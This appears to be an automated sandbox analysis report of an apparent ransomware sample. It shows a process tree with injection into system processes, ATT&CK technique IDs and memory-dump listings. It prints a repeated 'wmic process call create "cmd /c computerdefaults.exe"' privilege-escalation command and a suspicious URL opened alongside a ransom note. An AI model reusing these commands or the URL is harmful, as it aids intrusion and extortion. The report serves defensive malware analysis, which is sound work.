PID 3432 wrote to memory of 2960	3432	RuntimeBroker.exe	104
PID 1196 wrote to memory of 1440	1196	cmd.exe	105
PID 1196 wrote to memory of 1440	1196	cmd.exe	105
PID 3292 wrote to memory of 2700	3292	cmd.exe	106
PID 3292 wrote to memory of 2700	3292	cmd.exe	106
PID 3064 wrote to memory of 3140	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	107
PID 3064 wrote to memory of 3140	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	107
PID 3064 wrote to memory of 3664	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	108
PID 3064 wrote to memory of 3664	3064	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	108
PID 1644 wrote to memory of 4084	1644	cmd.exe	111
PID 1644 wrote to memory of 4084	1644	cmd.exe	111
PID 1740 wrote to memory of 780	1740	cmd.exe	114
PID 1740 wrote to memory of 780	1740	cmd.exe	114
PID 2960 wrote to memory of 596	2960	cmd.exe	115
PID 2960 wrote to memory of 596	2960	cmd.exe	115
PID 1904 wrote to memory of 1072	1904	cmd.exe	116
PID 1904 wrote to memory of 1072	1904	cmd.exe	116
PID 1756 wrote to memory of 1800	1756	cmd.exe	117
PID 1756 wrote to memory of 1800	1756	cmd.exe	117
PID 3444 wrote to memory of 508	3444	cmd.exe	122
PID 3444 wrote to memory of 508	3444	cmd.exe	122
PID 4052 wrote to memory of 2104	4052	cmd.exe	120
PID 4052 wrote to memory of 2104	4052	cmd.exe	120
PID 2816 wrote to memory of 3156	2816	cmd.exe	121
PID 2816 wrote to memory of 3156	2816	cmd.exe	121
PID 3140 wrote to memory of 1372	3140	cmd.exe	123
PID 3140 wrote to memory of 1372	3140	cmd.exe	123
PID 3664 wrote to memory of 1900	3664	cmd.exe	124
PID 3664 wrote to memory of 1900	3664	cmd.exe	124
PID 2828 wrote to memory of 2760	2828	cmd.exe	125
PID 2828 wrote to memory of 2760	2828	cmd.exe	125
PID 1296 wrote to memory of 948	1296	cmd.exe	130
PID 1296 wrote to memory of 948	1296	cmd.exe	130

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3708
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3708 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3332

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3432
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2104
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2960
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:596

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3140
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1372
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3664
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1900
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:780
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1644
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4084

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2872
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2700
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1196
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
PID:2636
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1400
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://4ea45ef812585200feltalkfzj.jobsbig.cam/eltalkfzj^&1^&45768267^&81^&335^&2215063"
  2⤵
  - Checks computer location settings
  PID:744
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1600
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3852
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1680

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:2620
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3004
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1392

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1800

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1904
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1072

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:508

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3156

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2828
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2760

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:948
- - C:\Windows\System32\ie4uinit.exe
    "C:\Windows\System32\ie4uinit.exe" -reinstall
    3⤵
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:4396
- - C:\Windows\system32\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
    3⤵
    - Drops file in Windows directory
    - Modifies registry class
    PID:4148

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:2156
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3796

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:608
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4204

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:3312
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:676
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4296

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4108
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4272

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4164
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4332

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4780

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4820

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2572

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:4212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:404

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2620-130-0x000001FC1EA30000-0x000001FC1EA34000-memory.dmp

Filesize
16KB

Download
memory/3064-161-0x00000149E1A90000-0x00000149E1A91000-memory.dmp

Filesize
4KB

Download
memory/3064-123-0x00000149E1480000-0x00000149E1481000-memory.dmp

Filesize
4KB

Download
memory/3064-120-0x00000149DF500000-0x00000149DF501000-memory.dmp

Filesize
4KB

Download
memory/3064-121-0x00000149DF510000-0x00000149DF511000-memory.dmp

Filesize
4KB

Download
memory/3064-122-0x00000149DF520000-0x00000149DF521000-memory.dmp

Filesize
4KB

Download
memory/3064-125-0x00000149E14A0000-0x00000149E14A1000-memory.dmp

Filesize
4KB

Download
memory/3064-119-0x00000149DF4F0000-0x00000149DF4F1000-memory.dmp

Filesize
4KB

Download
memory/3064-118-0x00000149DF3A0000-0x00000149DF3A6000-memory.dmp

Filesize
24KB

Download
memory/3064-129-0x00000149E1500000-0x00000149E1501000-memory.dmp

Filesize
4KB

Download
memory/3064-128-0x00000149E14F0000-0x00000149E14F1000-memory.dmp

Filesize
4KB

Download
memory/3064-124-0x00000149E1490000-0x00000149E1491000-memory.dmp

Filesize
4KB

Download
memory/3064-126-0x00000149E14D0000-0x00000149E14D1000-memory.dmp

Filesize
4KB

Download
memory/3064-127-0x00000149E14E0000-0x00000149E14E1000-memory.dmp

Filesize
4KB

Download